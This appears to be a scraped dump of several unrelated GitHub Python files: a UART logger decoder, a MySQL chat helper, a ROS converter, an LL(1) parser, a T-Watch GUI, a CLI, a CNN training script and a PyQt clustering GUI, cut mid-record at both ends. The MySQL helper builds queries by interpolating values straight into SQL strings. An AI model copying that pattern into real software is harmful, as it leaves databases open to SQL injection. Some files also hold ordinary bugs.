)),\n ('num_output', 'ReadNumOutput', (1, )),\n )\n\n def __init__(self):\n self.filename = ''\n self.count = 0\n self.out_ann = None\n self.file = None\n\n def start(self):\n self.out_ann = self.register(srd.OUTPUT_ANN)\n self.count = 0\n self.filename = self.options['file_name']\n if self.filename is None or len(self.filename) <= 0:\n raise Exception('specify file_name option')\n self.file = open(self.filename, 'wb', buffering=0)\n\n def put_char(self, bit):\n self.put(self.count, self.count, self.out_ann, [0, [bit]])\n\n def put_num(self, num):\n self.put(self.count, self.count, self.out_ann, [1, [str(num)]])\n\n def decode(self, ss, es, data):\n self.count += 1\n ptype, rxtx, pdata = data\n if ptype != 'DATA':\n return\n num = pdata[0]\n self.put_num(num)\n self.put_char(chr(num))\n try:\n self.file.write(bytes([num]))\n except Exception as e:\n print(e)\n","repo_name":"vchernokulsky/RPiDevLogger","sub_path":"decoders/uart_logger/pd.py","file_name":"pd.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70920762668","text":"import os\nimport sys\nsys.path.append(os.path.abspath(os.path.dirname(__file__)+'/'+'..'))\nfrom database.pymysql_comm import UsingMysql\nimport ast\n\n#----------------------------\n# 添加接收信息列表\n# 根据账号增加信息列表\ndef fetch_mes_by_filter(cursor, id):\n sql = f'select message from user where id = {id}' \n cursor.execute(sql)\n data_str = cursor.fetchall()[0]['message']\n data_dict = ast.literal_eval(data_str)\n # print('-- 查询用户信息列表: %s'%data_dict)\n return data_dict\n# 查找\ndef get_mes_by_id(id):\n with UsingMysql(log_time=False) as um:\n data_dict = fetch_mes_by_filter(um.cursor, id)\n #处理\n return data_dict\n\ndef up_mes_by_id(cursor, id, con):\n sql = f'''update user set message = \"{con}\" where id = {id}'''\n print(sql)\n cursor.execute(sql)\n\ndef update_mes_by_id(id, messages):\n with UsingMysql(log_time=False) as um:\n up_mes_by_id(um.cursor, id, messages)\n\n# update_mes_by_id('234', \"{'cheng': '今天天气怎么样?'}\"), \n# print(type(get_mes_by_id(123)))","repo_name":"xuchengcheng926/chatting","sub_path":"server/interface/mysql_message.py","file_name":"mysql_message.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44844503928","text":"import rospy\nimport struct\n\nfrom sensor_msgs import point_cloud2\nfrom sensor_msgs.msg import PointCloud2, PointField\nfrom std_msgs.msg import Header\n\n\nclass ColorGenerator:\n\n def __init__(self):\n self.index = 0\n self.color_list = []\n self.generateList()\n\n def generateList(self):\n rgb_list = [\n [255, 51, 153],\n [153, 51, 255],\n [51, 153, 255],\n [51, 255, 153],\n [153, 255, 51],\n [255, 153, 51],\n ]\n for rgb in rgb_list:\n self.color_list.append(struct.unpack('I', struct.pack('BBBB', rgb[2], rgb[1], rgb[0], 0))[0])\n\n def getColor(self):\n c = self.color_list[self.index]\n self.index = (self.index + 1) % len(self.color_list)\n return c\n\n\ndef ShapelyPointToROSPoint(p, color=None):\n return [p.x, p.y, p.z, color]\n\n\ndef MultiPointToPoints(mp, color=None):\n return [ShapelyPointToROSPoint(p, color) for p in mp]\n\n\ndef ClustersToPointCloud2(clusters):\n color_generator = ColorGenerator()\n\n points = []\n for c in clusters:\n points.extend(MultiPointToPoints(c.getPoints(), color_generator.getColor()))\n\n fields = [PointField('x', 0, PointField.FLOAT32, 1),\n PointField('y', 4, PointField.FLOAT32, 1),\n PointField('z', 8, PointField.FLOAT32, 1),\n PointField('rgb', 12, PointField.UINT32, 1),\n # PointField('rgba', 12, PointField.UINT32, 1),\n ]\n\n header = Header()\n header.frame_id = \"map\"\n header.stamp = rospy.Time.now()\n pc2 = point_cloud2.create_cloud(header, fields, points)\n\n return pc2\n","repo_name":"908941087/mmwave_radar_indoor_false","sub_path":"ti_ws/src/py_interface/scripts/EnvClassifier/ShapeOperator/ClustersToPointCloud2Converter.py","file_name":"ClustersToPointCloud2Converter.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4244893609","text":"import sys\n\nGrammer = dict() # 文法\nFIRST = dict() # FIRST集\nFOLLOW = dict() # FOLLOW集\nTable = dict() # 分析表\nVT = set() # 终结符\nleftRucrFlag = False\n\ndef get_VT():\n for key in Grammer.keys():\n for item in Grammer[key]:\n for ch in item:\n if not ch.isupper():\n VT.add(ch)\n VT.add('#')\n\ndef judge_leftRucr(key,A):\n global leftRucrFlag\n if leftRucrFlag is True:\n return\n for item in Grammer[key]:\n if item[0].isupper() and item[0]!=A:\n judge_leftRucr(item[0],A)\n elif item[0]==A:\n leftRucrFlag = True\n return\n\n\n\ndef judge_LL1():\n # 消除左递归(待完成)\n # 判断FIRST(αi) & FIRST(aj) =null ; A->α α=》'ε' FIRST(A) & FOLLOW(A) =null\n for key in Grammer.keys():\n for item1 in Grammer[key]:\n for item2 in Grammer[key]:\n if item1 != item2 and len(FIRST[item1] & FIRST[item2]) > 0:\n return False\n if 'ε' in FIRST[item1]:\n if len(FIRST[key] & FOLLOW[key]) > 0:\n return False\n return True\n\n\ndef get_first():\n FIRST_SIZE = dict()\n # 对每个文法符号求first集\n # 初始化,并对终结符求first集\n for k in Grammer.keys():\n FIRST[k] = set()\n FIRST_SIZE[k] = 0\n for v in VT:\n FIRST[v] = set(v)\n FIRST_SIZE[v] = 1\n # 对非终结符求first集,当fist_size不再增大,停止循环\n done = False\n while not done:\n done = True\n for k in Grammer.keys():\n for item in Grammer[k]:\n # 产生式X->a...的形式\n if not item[0].isupper():\n FIRST[k].add(item[0])\n # 产生式X->Y1Y2Y3...的形式\n elif item[0].isupper():\n FIRST[k] = FIRST[k].union(FIRST[item[0]] - set('ε'))\n for index, ch in zip(range(len(item)), item):\n if 'ε' in FIRST[ch] and index + 1 < len(item):\n FIRST[k] = FIRST[k].union(FIRST[item[index + 1]] - set('ε'))\n else:\n break\n # 所有的Y1,Y2,Y3...都包含空字,将空字加到first(X)\n for ch in item:\n if 'ε' not in FIRST[ch]:\n break\n else:\n FIRST[k].add('ε')\n # 检查first集大小的变化\n if len(FIRST[k]) != FIRST_SIZE[k]:\n done = False\n FIRST_SIZE[k] = len(FIRST[k])\n # 对候选项(可能是符号串)求first集\n for k in Grammer.keys():\n for item in Grammer[k]:\n get_strFirst(item)\n FIRST['ε'] = set('ε')\n\n\n# 在单个符号的first集求出后,可调用此函数求任意符号串X1X2X3...的first集,方法与求X->Y1Y2Y3...形式的first(X)一样\ndef get_strFirst(item):\n if len(item) > 1:\n FIRST[item] = FIRST[item[0]] - set('ε')\n for index, ch in zip(range(len(item)), item):\n if 'ε' in FIRST[ch] and index + 1 < len(item):\n FIRST[item] = FIRST[item].union(FIRST[index + 1] - set('ε'))\n else:\n break\n for ch in item:\n if 'ε' not in FIRST[ch]:\n break\n else:\n FIRST[item].add('ε')\n\n\ndef get_follow():\n FOLLOW_SIZE = dict()\n for k in Grammer.keys():\n FOLLOW[k] = set()\n FOLLOW_SIZE[k] = 0\n FOLLOW['E'].add('#')\n done = False\n while not done:\n done = True\n for k in Grammer.keys():\n for item in Grammer[k]:\n for index, ch in zip(range(len(item)), item):\n if ch.isupper():\n if index + 1 < len(item):\n get_strFirst(item[index + 1:])\n #A->αBβ\n FOLLOW[ch] = FOLLOW[ch].union(FIRST[item[index + 1:]] - set('ε'))\n #A->αB,或A->αBβ β=》ε\n if index == len(item) - 1 or 'ε' in FIRST[item[index + 1:]]:\n FOLLOW[ch] = FOLLOW[ch].union(FOLLOW[k])\n if len(FOLLOW[ch]) != FOLLOW_SIZE[ch]:\n FOLLOW_SIZE[ch] = len(FOLLOW[ch])\n done = False\n\n\ndef get_Table():\n for key in Grammer.keys():\n Table[key] = dict()\n for v in VT - set('ε'):\n Table[key][v] = str()\n for key in Grammer.keys():\n for item in Grammer[key]:\n # 终结符属于first(候选项)时\n for v in FIRST[item]:\n if v != 'ε':\n Table[key][v] = key + \"->\" + item\n # first(候选项)中有空字时,考虑follow集\n if 'ε' in FIRST[item]:\n for v in FOLLOW[key]:\n Table[key][v] = key + \"->\" + item\n # 无定义的Table{key][v],标上出错标志\n for key in Grammer.keys():\n for v in VT - set('ε'):\n if len(Table[key][v]) == 0:\n Table[key][v] = \"error\"\n","repo_name":"zhibin-huang/compiler-labs","sub_path":"LL1/LL1.py","file_name":"LL1.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"22988517708","text":"import lvgl as lv\nfrom constants import Constants\nfrom gui.app import App\nfrom micropython import const\nfrom lv_colors import lv_colors\nfrom gui.icon import Icon\ntry:\n import ulogging as logging\nexcept:\n import logging\n \nclass Setup():\n \n def __init__(self,mainbar):\n self.log = logging.getLogger(\"Setup\")\n self.log.setLevel(logging.DEBUG)\n self.setup_icon_data = [None]*Constants.MAX_SETUP_ICON\n self.setup_icon_dsc = [None]*Constants.MAX_SETUP_ICON \n self.mainbar = mainbar\n \n def setup_register(self,setup_name,icon_filename,event_cb):\n self.setup_tile = self.mainbar.gui.app_tile\n self.log.debug(\"register \" + setup_name + \" with icon filename \" + icon_filename)\n setup = self.setup_tile.get_free_app_icon()\n if setup == None:\n return\n else:\n self.log.debug(\"Icon successfully registered\")\n \n setup.active = True # reserve the icon\n # setup label\n setup.label.set_text(setup_name)\n \n setup.label.align(setup.cont, lv.ALIGN.OUT_BOTTOM_MID, 0, 0 )\n setup.label.set_align(lv.label.ALIGN.CENTER );\n setup.cont.set_hidden(False)\n setup.label.set_hidden(False)\n #\n # setup icon and set event callback\n # create the img buttons allowing to start the apps\n #\n setup_style = lv.style_t()\n setup_style.copy(self.mainbar.get_style())\n #\n # create the imgbtn\n #\n setup.icon_img = lv.imgbtn(app.cont,None)\n \n (setup.icon_img_data,setup.icon_img_dsc) = self.get_setup_image(icon_filename)\n setup.icon_img.set_src(lv.btn.STATE.RELEASED,setup.icon_img_dsc)\n setup.icon_img.set_src(lv.btn.STATE.PRESSED,setup.icon_img_dsc)\n setup.icon_img.set_src(lv.btn.STATE.CHECKED_RELEASED,setup.icon_img_dsc)\n setup.icon_img.set_src(lv.btn.STATE.CHECKED_PRESSED,setup.icon_img_dsc)\n setup.icon_img.reset_style_list(lv.obj.PART.MAIN)\n setup.icon_img.align(setup.cont, lv.ALIGN.IN_TOP_LEFT, 0, 0 )\n setup.icon_img.set_event_cb(event_cb)\n self.log.debug(\"imgbtn position: %d,%d\"%(setup.x,setup.y)) \n self.mainbar.add_slide_element( setup.icon_img )\n\n # setup the indicator\n setup.indicator = lv.img(setup.cont,None)\n setup.indicator.align(setup.cont, lv.ALIGN.IN_TOP_LEFT, 0, 0 )\n setup.indicator.set_hidden(True)\n \n lv.obj.invalidate( lv.scr_act() )\n return setup\n\n def get_setup_image(self,filename):\n\n try:\n sdl_filename = 'images/' + filename + \"_argb8888.bin\"\n self.log.debug('sdl filename: ' + sdl_filename)\n with open(sdl_filename,'rb') as f:\n setup_icon_data = f.read()\n self.log.debug(sdl_filename + \" successfully read\")\n except:\n twatch_filename = 'images/' + filename + \"_argb565.bin\"\n self.log.debug('t-watch filename: ' + twatch_filename)\n try:\n with open(twatch_filename,'rb') as f:\n setup_icon_data = f.read()\n self.log.debug(twatch_filename + \" successfully read\")\n \n except:\n self.log.error(\"Could not find image file: \" + filename) \n\n setup_icon_dsc = lv.img_dsc_t(\n {\n \"header\": {\"always_zero\": 0, \"w\": 64, \"h\": 64, \"cf\": lv.img.CF.TRUE_COLOR_ALPHA},\n \"data\": setup_icon_data,\n \"data_size\": len(setup_icon_data),\n }\n )\n return (setup_icon_data,setup_icon_dsc) \n","repo_name":"uraich/twatch2020_firmware","sub_path":"src/gui/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"34571133000","text":"\"\"\"\nCLI for normalization\n\"\"\"\n\nimport csv\n\nimport click\n\nfrom normalize_ids import (MODEL_FIELDNAMES,\n normalize_bpro,\n normalize_chadwick,\n normalize_crunchtime,\n normalize_sfbb)\n\n\nTRANSLATORS = {\n 'bpro': normalize_bpro,\n 'chadwick': normalize_chadwick,\n 'crunchtime': normalize_crunchtime,\n 'sfbb': normalize_sfbb,\n}\n\n@click.command('normalize')\n@click.option('-s', 'system', required=True,\n type=click.Choice(TRANSLATORS.keys()))\n@click.option('-i', 'input_path', required=True,\n type=click.Path(exists=True, dir_okay=False))\n@click.option('-o', 'output_fp', type=click.File('w'), required=True)\ndef normalize_id_registry(system, input_path, output_fp):\n \"\"\"Normalizes a given ID registry\n \"\"\"\n\n # watch encoding from crunchtime :/\n encoding = 'latin-1' if system in ('crunchtime', 'bpro') else 'utf-8'\n\n reader = csv.DictReader(open(input_path, encoding=encoding))\n writer = csv.DictWriter(output_fp, MODEL_FIELDNAMES)\n writer.writeheader()\n\n translator_fn = TRANSLATORS[system]\n\n for row in reader:\n model = translator_fn(row)\n writer.writerow(dict(model))\n\n click.echo(f'Wrote to {output_fp.name}')\n\n\nif __name__ == '__main__':\n normalize_id_registry() # pylint: disable=no-value-for-parameter\n","repo_name":"mattdennewitz/baseball-normalize-player-ids","sub_path":"bin/bid_normalize_register.py","file_name":"bid_normalize_register.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"24256196254","text":"import numpy as np\nimport os\nimport random\nimport datetime\n\nfrom models.cnn import ConvNet\nfrom models.cnn_dropout import ConvNetDropout\nfrom trainer.trainer import ModelTrainer\nfrom data_loader.load_cifar import CifarDataLoader\nfrom config.config import Config\n\n\nSAVE_DIR = os.path.join(os.getcwd(),'saved_models')\n\nconfig_default = {\n 'batch_size' : 32,\n 'num_classes' : 10,\n 'epochs' : 75,\n 'input_shape' : (32, 32, 3),\n 'optimizer' : 'not_set' # will be set later\n}\n\nRESULTS_FILE = \"results.txt\"\nSEED = 0\n\ndef main():\n\n f = open(RESULTS_FILE, \"a\")\n f.write(\"Results from \" + str(datetime.datetime.now()) + \"\\n\")\n \n # Load config\n config = Config(config_default)\n\n # Load data\n load_data = CifarDataLoader(config)\n train_data = load_data.get_train_data()\n validation_data = load_data.get_test_data()\n\n optimizers = ['adam', 'adagrad', 'sgd']\n # optimizers = ['adam']\n\n # Loop over multiple optimizers\n # Without dropout\n for optimizer in optimizers:\n\n # Set optimizer\n config_default['optimizer'] = optimizer\n\n # Load config\n config = Config(config_default)\n\n # Create model\n temp = ConvNet(config)\n model = temp.get_model() # without dropout\n\n # Train model\n trainer = ModelTrainer(model, train_data, validation_data, config) # without dropout\n trainer.train()\n\n # Save trained model\n model_name = 'cnn_' + optimizer + '.h5' # without dropout\n save_model = os.path.join(SAVE_DIR,model_name)\n trainer.save(save_model)\n\n # Print the results\n print(\"optimizer: \", optimizer)\n print(\"Without dropout\")\n print(\"loss: \", trainer.loss)\n print(\"validation loss: \", trainer.val_loss)\n\n f.write(\"optimizer: \" + optimizer + \"\\n\\n\")\n f.write(\"Without dropout \\n\")\n f.write(\"loss: \" + str(trainer.loss) + \"\\n\")\n f.write(\"validation loss: \" + str(trainer.val_loss) + \"\\n\")\n f.write(\"\\n\")\n\n # Loop over multiple optimizers\n # With dropout\n for optimizer in optimizers:\n \n # Set optimizer\n config_default['optimizer'] = optimizer\n\n # Load config\n config = Config(config_default)\n\n # Create model\n temp = ConvNetDropout(config)\n model_do = temp.get_model() # with dropout\n\n # Train model\n trainer_do = ModelTrainer(model_do, train_data, validation_data, config) # with dropout\n trainer_do.train()\n\n # Save trained model\n model_do_name = 'cnn_dropout' + optimizer + '.h5' # with dropout\n save_model_do = os.path.join(SAVE_DIR,model_do_name)\n trainer_do.save(save_model_do)\n\n # Print the results\n print(\"optimizer: \", optimizer)\n print(\"With dropout\")\n print(\"loss: \", trainer_do.loss)\n print(\"validation loss: \", trainer_do.val_loss)\n\n f.write(\"optimizer: \" + optimizer + \"\\n\\n\")\n f.write(\"With dropout \\n\")\n f.write(\"loss: \" + str(trainer_do.loss) + \"\\n\")\n f.write(\"validation loss: \" + str(trainer_do.val_loss) + \"\\n\")\n f.write(\"\\n\")\n\n\n\n f.write(\"\\n\\n\\n\")\n f.close()\nif __name__ == '__main__':\n main()","repo_name":"juvekaradheesh/AML-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18019786272","text":"import sys\r\n\r\nfrom PyQt5 import QtWidgets, QtCore\r\nfrom PyQt5.QtWidgets import QMainWindow , QTableWidgetItem, QAction, QApplication, QMdiArea,QListWidgetItem, QListWidget, QPushButton, QHBoxLayout, QVBoxLayout, QWidget, QTableWidget,QCheckBox,QLineEdit \r\nfrom PyQt5.QtGui import QIcon\r\nimport numpy as np\r\nimport csv\r\nfrom tkinter.filedialog import askopenfilenames\r\nfrom tkinter import Tk\r\n\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nfrom sklearn.cluster import SpectralClustering\r\n\r\nfrom sklearn.metrics import silhouette_score\r\nimport internal_validation\r\n\r\nfrom fileOP import writeRows\r\nfrom resultOP import table_result\r\nfrom sklearn.metrics.cluster import normalized_mutual_info_score\r\nfrom sklearn.metrics.cluster import adjusted_rand_score\r\nfrom sklearn.metrics import jaccard_similarity_score\r\nfrom ExterValid import accuracy\r\n\r\nTk().withdraw()\r\n\r\n\r\n\r\n\r\nclass GUI(QMainWindow):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n \r\n self.data = []\r\n self.label = []\r\n self.label_b = []\r\n self.gt = []\r\n self.internal_index = []\r\n self.internal_index_b = []\r\n self.external_index = []\r\n \r\n self.data_dict = dict()\r\n self.label_dict = dict()\r\n self.label_b_dict = dict()\r\n self.gt_dict = dict()\r\n self.internal_dict = dict()\r\n self.internal_dict_b = dict()\r\n self.external_dict = dict()\r\n self.external_dict_b = dict()\r\n \r\n self.initUI()\r\n \r\n \r\n def initUI(self):\r\n self.setWindowTitle(\"Clust\") \r\n self.mdi = QMdiArea()\r\n self.setCentralWidget(self.mdi)\r\n #textEdit = QTextEdit()\r\n #self.setCentralWidget(textEdit)\r\n \r\n \r\n #Actions for View\r\n self.addDataAction = QAction(\"Add data\",self)\r\n self.addLabelAction = QAction(\"Add label\",self)\r\n self.addGTAction = QAction(\"Add ground truth\",self)\r\n self.deleteAction = QAction(\"Delete everything\", self\r\n )\r\n \r\n self.addDataAction.setShortcut('Ctrl+D')\r\n self.addDataAction.setStatusTip('Add new dataset')\r\n \r\n self.addLabelAction.setShortcut('Ctrl+L')\r\n self.addLabelAction.setStatusTip('Add new label')\r\n \r\n self.addGTAction.setShortcut('Ctrl+G')\r\n self.addGTAction.setStatusTip('Add ground truth')\r\n \r\n self.addDataAction.triggered.connect(self.addData)\r\n self.addLabelAction.triggered.connect(self.addLabel)\r\n self.addGTAction.triggered.connect(self.addGt)\r\n\r\n self.exitAction = QAction(QIcon('exit24.png'), 'Exit', self)\r\n self.exitAction.setShortcut('Ctrl+Q')\r\n self.exitAction.setStatusTip('Exit application')\r\n self.exitAction.triggered.connect(self.close)\r\n \r\n self.deleteAction.triggered.connect(self.delete)\r\n \r\n \r\n #Action for Tools\r\n \r\n self.clusterAction = QAction(\"Cluster data\", self)\r\n self.validateAction = QAction(\"Validate data\", self)\r\n self.exvalidationAction = QAction(\"External validate\", self)\r\n self.pcaAction = QAction(\"PCA plot\", self)\r\n \r\n self.clusterAction.triggered.connect(self.clusterData)\r\n self.validateAction.triggered.connect(self.internal_validate_b)\r\n self.exvalidationAction.triggered.connect(self.external_validate)\r\n \r\n self.statusBar()\r\n\r\n self.menubar = self.menuBar()\r\n self.fileMenu = self.menubar.addMenu('&File')\r\n self.toolMenu = self.menubar.addMenu('&Tools')\r\n self.fileMenu.addAction(self.addDataAction)\r\n self.fileMenu.addAction(self.addLabelAction)\r\n self.fileMenu.addAction(self.addGTAction)\r\n self.fileMenu.addAction(self.exitAction)\r\n self.fileMenu.addAction(self.deleteAction)\r\n \r\n #toolbar = self.addToolBar('Exit')\r\n #toolbar.addAction(exitAction)\r\n \r\n self.ViewMenu = self.menubar.addMenu('&View')\r\n self.toolMenu.addAction(self.clusterAction)\r\n self.toolMenu.addAction(self.validateAction)\r\n self.toolMenu.addAction(self.exvalidationAction)\r\n \r\n self.showDataAction = QAction(\"Show data\",self)\r\n self.showLabelAction = QAction(\"Show label\",self)\r\n self.showGTAction = QAction(\"Show ground truth\",self)\r\n self.showInternalA = QAction(\"Show internal validation\", self)\r\n self.showExternalA = QAction(\"Show external validation\", self)\r\n \r\n self.showDataAction.setShortcut('Ctrl+1')\r\n self.addDataAction.setStatusTip('View datasets')\r\n \r\n self.showLabelAction.setShortcut('Ctrl+2')\r\n \r\n self.showGTAction.setShortcut('Ctrl+3')\r\n self.addGTAction.setStatusTip('View current ground truth')\r\n \r\n self.showDataAction.triggered.connect(self.showData)\r\n self.showLabelAction.triggered.connect(self.showLabel)\r\n self.showGTAction.triggered.connect(self.showGT)\r\n self.showInternalA.triggered.connect(self.showInternal)\r\n self.showExternalA.triggered.connect(self.showExternal)\r\n \r\n self.ViewMenu.addAction(self.showDataAction)\r\n self.ViewMenu.addAction(self.showLabelAction)\r\n self.ViewMenu.addAction(self.showGTAction)\r\n self.ViewMenu.addAction(self.showInternalA)\r\n self.ViewMenu.addAction(self.showExternalA)\r\n \r\n \r\n self.exportLabelAction = QAction(\"Export label\", self)\r\n self.exportLabelAction.triggered.connect(self.exportLabel)\r\n \r\n self.exportInternalAction = QAction(\"Export internal\", self)\r\n self.exportInternalAction.triggered.connect(self.exportInternal)\r\n \r\n self.exportExternalAction = QAction(\"Export external\", self)\r\n self.exportExternalAction.triggered.connect(self.exportExternal)\r\n \r\n self.ExportMenu = self.menubar.addMenu('&Export')\r\n self.ExportMenu.addAction(self.exportLabelAction)\r\n self.ExportMenu.addAction(self.exportInternalAction)\r\n self.ExportMenu.addAction(self.exportExternalAction)\r\n \r\n self.setGeometry(100, 100, 1200, 1000)\r\n self.setWindowTitle('Main window') \r\n self.show()\r\n \r\n def insert_data(self, data_file_name, s):\r\n data_name = data_file_name.split('/')[-1] .split('.')[0]\r\n data_peak = np.recfromcsv(data_file_name, delimiter = ',') # peak through data to see number of rows and cols\r\n \r\n num_cols = len(data_peak[0])\r\n num_rows = len(data_peak)\r\n \r\n new_data = np.zeros([num_rows+1, num_cols]) # num_cols - 1 means skip label col\r\n with open(data_file_name) as csvfile:\r\n row_index = 0\r\n reader= csv.reader(csvfile)\r\n for row in reader:\r\n for cols_index in range(num_cols):\r\n new_data[row_index][cols_index]= row[cols_index]\r\n row_index+=1\r\n \r\n if s == \"data\":\r\n self.data.append(new_data)\r\n self.data_dict[len(self.data)] = [data_name,num_rows,num_cols, \"Imported\"]\r\n elif s == \"label\":\r\n new_data = np.transpose(new_data)\r\n \r\n self.label_b.append(new_data)\r\n #print(len(label_b_dict))\r\n #print(label_b)\r\n self.label_b_dict[len(self.label_b_dict) + 1] = [ data_name ]\r\n elif s == \"gt\":\r\n self.gt.append(np.transpose(new_data))\r\n self.gt_dict[len(self.data)] = [data_name,num_rows,num_cols, \"Imported\"]\r\n\r\n \r\n def delete(self):\r\n \r\n self.data = []\r\n self.label = []\r\n self.label_b = []\r\n self.gt = []\r\n self.internal_index = []\r\n self.internal_index_b = []\r\n self.external_index = []\r\n \r\n self.data_dict = dict()\r\n self.label_dict = dict()\r\n self.label_b_dict = dict()\r\n self.gt_dict = dict()\r\n self.internal_dict = dict()\r\n self.internal_dict_b = dict()\r\n self.external_dict = dict()\r\n self.external_dict_b = dict()\r\n \r\n def addData(self):\r\n addr_list = askopenfilenames()\r\n for i in addr_list:\r\n self.insert_data(i, s = \"data\")\r\n \r\n def addLabel(self):\r\n addr_list = askopenfilenames()\r\n for i in addr_list:\r\n self.insert_data(i, s = \"label\")\r\n def addGt(self):\r\n addr_list = askopenfilenames()\r\n for i in addr_list:\r\n self.insert_data(i, s = \"gt\") \r\n \r\n \r\n def showData(self):\r\n d_view = QTableWidget()\r\n h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n d_view.setRowCount(len(self.data_dict))\r\n d_view.setColumnCount(5)\r\n d_view.setHorizontalHeaderLabels(h)\r\n d_view.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n d_view.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.data_dict) + 1 ):\r\n for c in range(5):\r\n item = QTableWidgetItem()\r\n if c == 0:\r\n item.setText(str(i))\r\n else:\r\n item.setText(str(self.data_dict[i][c-1]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n d_view.setItem(i-1, c, item)\r\n self.mdi.addSubWindow(d_view)\r\n self.mdi.cascadeSubWindows()\r\n d_view.show()\r\n \r\n def showLabel(self):\r\n \r\n d_view = QTableWidget()\r\n h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n d_view.setRowCount(len(self. label_dict))\r\n d_view.setColumnCount(5)\r\n d_view.setHorizontalHeaderLabels(h)\r\n d_view.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n d_view.setWindowTitle(\"Label view\")\r\n for i in range(1, len(self. label_dict) + 1 ):\r\n for c in range(5):\r\n item = QTableWidgetItem()\r\n if c ==0:\r\n item.setText(str(i))\r\n else:\r\n item.setText(str(self. label_dict[i][c-1]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n d_view.setItem(i-1, c, item)\r\n self.mdi.addSubWindow(d_view)\r\n self.mdi.cascadeSubWindows()\r\n d_view.show()\r\n \r\n def showGT(self):\r\n d_view = QTableWidget()\r\n h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n d_view.setRowCount(len(self. data))\r\n d_view.setColumnCount(5)\r\n d_view.setHorizontalHeaderLabels(h)\r\n d_view.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n d_view.setWindowTitle(\"Ground truth view\")\r\n for i in range(1, len(self. gt_dict) + 1 ):\r\n for c in range(5):\r\n item = QTableWidgetItem()\r\n if c ==0:\r\n item.setText(str(i))\r\n else:\r\n item.setText(str(self. label_dict[i][c-1]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n d_view.setItem(i-1, c, item)\r\n self.mdi.addSubWindow(d_view)\r\n self.mdi.cascadeSubWindows()\r\n d_view.show()\r\n \r\n \r\n def showInternal(self):\r\n i_view = QTableWidget()\r\n h = [\"Dataset\", \"Clustering algorithm\", \"Silhouette\", \"DB\", \"Xie bienie\", \"Dunn\", \"CH\", \"I\", \"SD\", \"SDb_w\", \"CVNN\" ]\r\n i_view.setRowCount(len(self.internal_dict))\r\n i_view.setColumnCount(11)\r\n i_view.setHorizontalHeaderLabels(h)\r\n i_view.setWindowTitle(\"Internal Validation view\")\r\n for i in range(1, len(self.internal_dict) + 1 ):\r\n for c in range(11):\r\n item = QTableWidgetItem()\r\n item.setText(str(self.internal_dict[i][c]))\r\n i_view.setItem(i-1, c, item)\r\n self.mdi.addSubWindow(i_view)\r\n self.mdi.cascadeSubWindows()\r\n i_view.show()\r\n \r\n def showExternal(self):\r\n i_view = QTableWidget()\r\n h = [\"Dataset\", \"Clustering algorithm\", \"NMI\", \"AR\", \"Accuracy\", \"Jaccard\" ]\r\n i_view.setRowCount(len(self.external_dict))\r\n i_view.setColumnCount(6)\r\n i_view.setHorizontalHeaderLabels(h)\r\n i_view.setWindowTitle(\"External Validation view\")\r\n for i in range(1, len(self.external_dict) + 1 ):\r\n for c in range(6):\r\n item = QTableWidgetItem()\r\n item.setText(str(self.external_dict[i][c]))\r\n i_view.setItem(i-1, c, item)\r\n self.mdi.addSubWindow(i_view)\r\n self.mdi.cascadeSubWindows()\r\n i_view.show()\r\n \r\n def clusterData(self):\r\n temp = QVBoxLayout()\r\n temp2 = QHBoxLayout()\r\n self.clusterLayout = QWidget()\r\n self.d_view_clust = QListWidget()\r\n self.clust_push = QPushButton(\"Cluster\")\r\n self.clust_push.clicked.connect(self.cluster)\r\n \r\n# h = [\"ID\", \"Name\",\"Rows\", \"Columns\", \"Note\" ]\r\n# d_view.setRowCount(len(data))\r\n# d_view.setColumnCount(5)\r\n# d_view.setHorizontalHeaderLabels(h)\r\n self.d_view_clust.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\r\n self.d_view_clust.setWindowTitle(\"Data view\")\r\n for i in range(1, len(self.data_dict) + 1 ):\r\n item = QListWidgetItem()\r\n item.setText(str(self.data_dict[i][0]))\r\n item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)\r\n self.d_view_clust.addItem(item)\r\n self.kmeans =QCheckBox(\"Kmeans\")\r\n self.average = QCheckBox(\"Average\")\r\n self.complete = QCheckBox(\"Complete\")\r\n self.ward = QCheckBox(\"Ward\")\r\n self.spectral = QCheckBox(\"Spectral\")\r\n self.clust_text = QLineEdit()\r\n self.clust_text.resize(280,40)\r\n self.clust_text.setPlaceholderText(\"Nummber of K\")\r\n temp2.addWidget(self.kmeans)\r\n temp2.addWidget(self.average)\r\n temp2.addWidget(self.complete)\r\n temp2.addWidget(self.ward)\r\n temp2.addWidget(self.spectral)\r\n temp.addStretch(1)\r\n temp.addWidget(self.d_view_clust)\r\n 